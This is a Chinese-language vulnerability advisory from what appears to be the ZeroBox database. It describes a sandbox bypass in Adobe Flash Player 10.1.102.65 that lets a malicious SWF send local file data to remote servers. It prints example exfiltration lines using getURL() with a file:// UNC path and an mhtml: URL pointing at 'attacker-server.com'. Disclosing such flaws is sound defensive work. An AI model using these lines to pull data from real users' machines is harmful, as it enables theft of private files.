Adobe Flash Player local-with-filesystem沙盒安全绕过漏洞

漏洞起因
访问验证错误
危险等级
低

影响系统
Adobe Flash Player 10.1.102.65

不受影响系统

危害
远程攻击者可以利用漏洞获得目标用户系统敏感信息。

攻击所需条件
攻击者必须构建恶意SWF文件，诱使用户处理。

漏洞信息
Adobe Flash Player是一款Flash文件处理程序。
Adobe Flash Player SWFs local-with-filesystem沙盒不允许从本地文件系统中装载SWF，并传送数据给远程系统。
不过攻击者可以简单的使用file://绕过local-with-filesystem沙盒限制来与远程服务器通信，如从本地文件装载内容后，攻击者可以通过getURL()把内容发送到远程服务器上file://\\192.168.1.1\stolen-data-here\。
不过利用上面的方法只可提交本地网络中的IP和主机名(RFC 1918)，攻击者需要把数据发送给Internet上的远程服务器，可使用mhtml协议处理器绕过Flash沙盒：
getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

测试方法

厂商解决方案
目前没有详细解决方案提供：
http://www.adobe.com/products/flash/

漏洞提供者
Billy (BK) Rios

← YourTube v1.0 CSRF Vulnerability (Add User)

Apache Subversion Server组件多个拒绝服务漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Adobe Flash Player local-with-filesystem沙盒安全绕过漏洞

0 条评论。

发表评论